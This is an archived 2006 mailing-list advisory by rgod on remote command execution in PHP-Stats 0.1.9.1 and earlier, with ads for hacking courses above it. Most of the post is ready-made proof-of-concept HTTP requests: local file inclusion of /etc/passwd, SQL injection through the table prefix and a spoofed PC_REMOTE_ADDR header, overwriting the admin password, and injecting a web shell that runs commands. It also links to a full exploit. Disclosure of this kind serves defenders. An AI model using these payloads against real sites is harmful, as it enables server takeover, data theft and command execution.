Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

PHP-Stats <= 0.1.9.1 remote commands execution

from [rgod] Network Security [Permanent Link]
Subject: PHP-Stats <= 0.1.9.1 remote commands execution
Date: 4 Mar 2006 05:55:09 -0000 
------------- PHP-Stats <= 0.1.9.1 remote commands execution -------------------

software:
site: http://www.phpstats.net/
description: Open source statistical package for PHP enabled web sites
--------------------------------------------------------------------------------
i) vulnerable code in admin.php (and in nearly every scripts...) at line 65:

...
if(isset($_POST['option'])) { while (list ($key, $value) = each ($tmpOption)) 
$option[$key]=$value; }
...

you can overwrite at run-time the "option[]" array...,
raising SQL injection, arbitrary local inclusion and php injection issues, poc:

i.a) arbitrary local inclusion (with magic_quotes_gpc off):

i.a1)
POST [path]admin.php?do=0 HTTP/1.1\r\n";
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close

option=&option[clear_cache]=1&option[language]=../../../../../../etc/passwd[null
 char]

i.a2)
POST [path]admin.php?do=0 HTTP/1.1\r\n";
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close

option=&option[template]=../../../../../../etc/passwd[null char]

i.b) SQL injection - you can inject arbitrary SQL commands through the table
prefix, regardless of magic_quotes_gpc settings:

POST [path]admin.php?do=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close

option=&option[prefix]=[SQL]

i.c) PHP code injection - you can grant administrative privileges, overwriting
"option[admin_pass]" value and building a MD5 admin cookie on new value.
Now you can inject a shell in two different ways by administrative features,
poc:

i.c1)
POST [path]admin.php?action=esclusioni&opzioni=excfol HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: php_stats_cache=1; pass_cookie=[md5 hash of "suntzu"]
Host: [somehost]
Content-Length: [data_length]
Connection: Close

option=&option[admin_pass]=suntzu&option_new=[SHELL]

now you can launch commands including option/php-stats-options.php script,poc:

POST [path]admin.php?cmd=netstat%20-ano&do=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close

option=&option[language]=../option/php-stats-options.php[null char]

i.c2) the most chritical, this works regardless of any php.ini settings, you
can inject a shell in config.php and launch commands from it.
Poc exploit here:

http://retrogod.altervista.org/php_stats_0191_xpl.html

--------------------------------------------------------------------------------
ii) vulnerable code in click.php at line 18:

...
 if(isset($_SERVER['REMOTE_ADDR'])) $ip=(isset($_SERVER['HTTP_PC_REMOTE_ADDR']) 
? $_SERVER['HTTP_PC_REMOTE_ADDR'] : $_SERVER['REMOTE_ADDR']);
...

and line 65:

...
$result=sql_query("SELECT visitor_id FROM $option[prefix]_cache WHERE 
user_id='$ip' LIMIT 1");
...

you can inject sql commands through PC_REMOTE_ADDR http header, poc:

GET [path]click.php?id=1&get=1 HTTP/1.1
PC_REMOTE_ADDR: 'UNION SELECT '[code]'INTO OUTFILE 'shell.php' FROM 
php_stats_cache/*
Host: [host]
Connection: Close

--------------------------------------------------------------------------------
iii) information disclosure, you can go to:

http://[target]/[path]/checktables.php

to see at screen database table_prefix, making easier the exploitation 
process...

--------------------------------------------------------------------------------
rgod

site: http://retrogod.altervista.org
mail: rgod at autistici.org
original advisory: http://retrogod.altervista.org/php_stats_0191_adv.html
--------------------------------------------------------------------------------
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  [KAPDA::#30] - CuteNews1.4.1 Cross_Site_Scripting Vulnerability, roozbeh_afrasiabi
Next by Date:  AVG 7 granting Everyone Full Control to updated files... even its drivers, redxii1234
Previous by Thread:  [KAPDA::#30] - CuteNews1.4.1 Cross_Site_Scripting Vulnerability, roozbeh_afrasiabi
Next by Thread:  Re: PHP-Stats <= 0.1.9.1 remote commands execution, freesitealessandro
Indexes:  [Date] [Thread] [Top] [All Lists]